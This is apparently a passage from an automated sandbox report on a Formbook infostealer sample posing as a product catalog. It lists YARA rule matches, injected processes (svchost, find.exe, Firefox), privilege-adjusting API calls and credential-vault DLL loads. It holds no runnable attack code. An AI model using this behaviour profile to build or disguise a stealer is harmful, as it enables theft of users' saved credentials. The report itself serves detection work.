            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032CD3F45_2_032CD3F4
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032D5B775_2_032D5B77
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032D5B725_2_032D5B72
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032CF3C75_2_032CF3C7
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032CF1A75_2_032CF1A7
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032CF19E5_2_032CF19E
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeCode function: 5_2_032EE0875_2_032EE087
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038A03E66_2_038A03E6
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037EE3F06_2_037EE3F0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389A3526_2_0389A352
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038602C06_2_038602C0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038802746_2_03880274
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038A01AA6_2_038A01AA
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038941A26_2_038941A2
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038981CC6_2_038981CC
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037D01006_2_037D0100
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0387A1186_2_0387A118
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038681586_2_03868158
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038720006_2_03872000
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E07706_2_037E0770
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037DC7C06_2_037DC7C0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038047506_2_03804750
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FC6E06_2_037FC6E0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038A05916_2_038A0591
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E05356_2_037E0535
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0388E4F66_2_0388E4F6
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038844206_2_03884420
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038924466_2_03892446
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03896BD76_2_03896BD7
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389AB406_2_0389AB40
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037DEA806_2_037DEA80
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037F69626_2_037F6962
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038AA9A66_2_038AA9A6
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E29A06_2_037E29A0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E28406_2_037E2840
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037EA8406_2_037EA840
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0380E8F06_2_0380E8F0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037C68B86_2_037C68B8
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0385EFA06_2_0385EFA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03822F286_2_03822F28
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03800F306_2_03800F30
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037D2FC86_2_037D2FC8
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03882F306_2_03882F30
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03854F406_2_03854F40
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389CE936_2_0389CE93
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E0E596_2_037E0E59
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389EEDB6_2_0389EEDB
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389EE266_2_0389EE26
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037F2E906_2_037F2E90
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037EAD006_2_037EAD00
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0387CD1F6_2_0387CD1F
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037DADE06_2_037DADE0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037F8DBF6_2_037F8DBF
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03880CB56_2_03880CB5
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E0C006_2_037E0C00
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037D0CF26_2_037D0CF2
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0382739A6_2_0382739A
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037CD34C6_2_037CD34C
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389132D6_2_0389132D
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038812ED6_2_038812ED
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FD2F06_2_037FD2F0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FB2C06_2_037FB2C0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E52A06_2_037E52A0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037CF1726_2_037CF172
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037EB1B06_2_037EB1B0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038AB16B6_2_038AB16B
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0381516C6_2_0381516C
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0388F0CC6_2_0388F0CC
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038970E96_2_038970E9
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389F0E06_2_0389F0E0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E70C06_2_037E70C0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389F7B06_2_0389F7B0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038916CC6_2_038916CC
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038256306_2_03825630
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0387D5B06_2_0387D5B0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038A95C36_2_038A95C3
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038975716_2_03897571
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037D14606_2_037D1460
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389F43F6_2_0389F43F
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03855BF06_2_03855BF0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0381DBF96_2_0381DBF9
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389FB766_2_0389FB76
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FFB806_2_037FFB80
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03825AA06_2_03825AA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0387DAAC6_2_0387DAAC
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03881AA36_2_03881AA3
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0388DAC66_2_0388DAC6
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389FA496_2_0389FA49
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03897A466_2_03897A46
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03853A6C6_2_03853A6C
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E99506_2_037E9950
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FB9506_2_037FB950
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_038759106_2_03875910
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0384D8006_2_0384D800
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E38E06_2_037E38E0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389FFB16_2_0389FFB1
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389FF096_2_0389FF09
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A3FD26_2_037A3FD2
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037A3FD56_2_037A3FD5
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E1F926_2_037E1F92
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E9EB06_2_037E9EB0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037E3D406_2_037E3D40
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_037FFDC06_2_037FFDC0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03891D5A6_2_03891D5A
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03897D736_2_03897D73
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0389FCF26_2_0389FCF2
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03859C326_2_03859C32
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_03041BC06_2_03041BC0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0303CA976_2_0303CA97
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0303CAA06_2_0303CAA0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0303AD406_2_0303AD40
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0303CCC06_2_0303CCC0
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_030452906_2_03045290
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0304346B6_2_0304346B
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_030434706_2_03043470
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0305B9806_2_0305B980
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369E3F36_2_0369E3F3
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369E2D56_2_0369E2D5
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369D7F86_2_0369D7F8
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369E78C6_2_0369E78C
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369E55E6_2_0369E55E
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369CA166_2_0369CA16
            Source: C:\Windows\SysWOW64\find.exeCode function: 6_2_0369CA986_2_0369CA98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 107 times
            Source: C:\Windows\SysWOW64\find.exeCode function: String function: 037CB970 appears 262 times
            Source: C:\Windows\SysWOW64\find.exeCode function: String function: 03815130 appears 58 times
            Source: C:\Windows\SysWOW64\find.exeCode function: String function: 03827E54 appears 107 times
            Source: C:\Windows\SysWOW64\find.exeCode function: String function: 0385F290 appears 103 times
            Source: C:\Windows\SysWOW64\find.exeCode function: String function: 0384EA12 appears 86 times
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: String function: 0040E6D0 appears 35 times
            Source: Products Order Catalogs20242.exe, 00000000.00000003.1757295424.00000000049AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Products Order Catalogs20242.exe
            Source: Products Order Catalogs20242.exe, 00000000.00000003.1756177766.0000000004803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Products Order Catalogs20242.exe
            Source: Products Order Catalogs20242.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeFile created: C:\Users\user\AppData\Local\Temp\nondefinitionJump to behavior
            Source: Products Order Catalogs20242.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: find.exe, 00000006.00000002.4191342019.0000000003223000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000006.00000003.2371956427.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Products Order Catalogs20242.exeReversingLabs: Detection: 21%
            Source: Products Order Catalogs20242.exeVirustotal: Detection: 29%
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeFile read: C:\Users\user\Desktop\Products Order Catalogs20242.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Products Order Catalogs20242.exe "C:\Users\user\Desktop\Products Order Catalogs20242.exe"
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Products Order Catalogs20242.exe"
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Products Order Catalogs20242.exe"Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeSection loaded: rasadhlp.dllJump to behavior
